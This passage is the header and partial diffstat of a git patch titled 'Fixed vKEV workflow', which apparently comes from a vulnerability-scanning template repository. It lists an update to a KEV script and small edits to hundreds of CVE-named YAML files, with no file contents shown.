From 9a94bdccb7aa7090fc23d9c30574342e7a4982d5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 24 Sep 2025 14:01:01 +0800 Subject: [PATCH] Fixed vKEV workflow --- .github/scripts/update-kev.py | 34 +++++++++++++++++------- code/cves/2014/CVE-2014-0160.yaml | 2 +- code/cves/2017/CVE-2017-1000353.yaml | 2 +- code/cves/2019/CVE-2019-0604.yaml | 2 +- code/cves/2020/CVE-2020-0646.yaml | 2 +- code/cves/2021/CVE-2021-3156.yaml | 2 +- code/cves/2022/CVE-2022-42475.yaml | 2 +- code/cves/2023/CVE-2023-2640.yaml | 2 +- code/cves/2023/CVE-2023-2986.yaml | 2 +- dast/cves/2018/CVE-2018-19518.yaml | 2 +- dast/cves/2021/CVE-2021-45046.yaml | 2 +- dast/cves/2022/CVE-2022-22965.yaml | 2 +- dast/cves/2022/CVE-2022-42889.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-8739.yaml | 2 +- http/cves/2014/CVE-2014-9735.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1635.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4455.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-8562.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9499.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-15042.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5674.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-8735.yaml | 2 +- http/cves/2016/CVE-2016-9299.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-18349.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-8046.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2017/CVE-2017-9841.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10737.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10942.yaml | 2 +- http/cves/2018/CVE-2018-11222.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11686.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-1273.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14933.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16059.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17283.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-19127.yaml | 2 +- http/cves/2018/CVE-2018-19207.yaml | 2 +- http/cves/2018/CVE-2018-19276.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19410.yaml | 2 +- http/cves/2018/CVE-2018-20062.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 2 +- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6605.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7314.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7841.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0192.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0232.yaml | 2 +- http/cves/2019/CVE-2019-1003000.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-11886.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13372.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15774.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 2 +- http/cves/2019/CVE-2019-17228.yaml | 2 +- http/cves/2019/CVE-2019-17230.yaml | 2 +- http/cves/2019/CVE-2019-17231.yaml | 2 +- http/cves/2019/CVE-2019-17232.yaml | 2 +- http/cves/2019/CVE-2019-17233.yaml | 2 +- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17564.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18818.yaml | 2 +- http/cves/2019/CVE-2019-19781.yaml | 2 +- http/cves/2019/CVE-2019-19824.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20504.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-25141.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2725.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5128.yaml | 2 +- http/cves/2019/CVE-2019-5129.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7194.yaml | 2 +- http/cves/2019/CVE-2019-7195.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7276.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9194.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9762.yaml | 2 +- http/cves/2019/CVE-2019-9879.yaml | 2 +- http/cves/2019/CVE-2019-9880.yaml | 2 +- http/cves/2019/CVE-2019-9881.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-0618.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 2 +- http/cves/2020/CVE-2020-10189.yaml | 2 +- http/cves/2020/CVE-2020-10199.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10987.yaml | 2 +- http/cves/2020/CVE-2020-11455.yaml | 2 +- http/cves/2020/CVE-2020-11514.yaml | 2 +- http/cves/2020/CVE-2020-11515.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11975.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11984.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12124.yaml | 2 +- http/cves/2020/CVE-2020-12641.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-12800.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15415.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15920.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17518.yaml | 2 +- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-19625.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23814.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-26073.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26879.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27615.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-29047.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29390.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-3187.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 2 +- http/cves/2020/CVE-2020-35131.yaml | 2 +- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36155.yaml | 2 +- http/cves/2020/CVE-2020-36333.yaml | 2 +- http/cves/2020/CVE-2020-36708.yaml | 2 +- http/cves/2020/CVE-2020-36728.yaml | 2 +- http/cves/2020/CVE-2020-36731.yaml | 2 +- http/cves/2020/CVE-2020-36836.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5412.yaml | 2 +- http/cves/2020/CVE-2020-5766.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8657.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9547.yaml | 2 +- http/cves/2020/CVE-2020-9548.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 2 +- http/cves/2021/CVE-2021-20090.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21315.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21479.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21881.yaml | 2 +- http/cves/2021/CVE-2021-21972.yaml | 2 +- http/cves/2021/CVE-2021-21973.yaml | 2 +- http/cves/2021/CVE-2021-21975.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 2 +- http/cves/2021/CVE-2021-24170.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24527.yaml | 2 +- http/cves/2021/CVE-2021-24644.yaml | 2 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24876.yaml | 2 +- http/cves/2021/CVE-2021-24878.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 2 +- http/cves/2021/CVE-2021-25032.yaml | 2 +- http/cves/2021/CVE-2021-25094.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-27964.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 2 +- http/cves/2021/CVE-2021-32172.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32648.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33045.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33558.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-34187.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34621.yaml | 2 +- http/cves/2021/CVE-2021-34622.yaml | 2 +- http/cves/2021/CVE-2021-34624.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36749.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39341.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40655.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 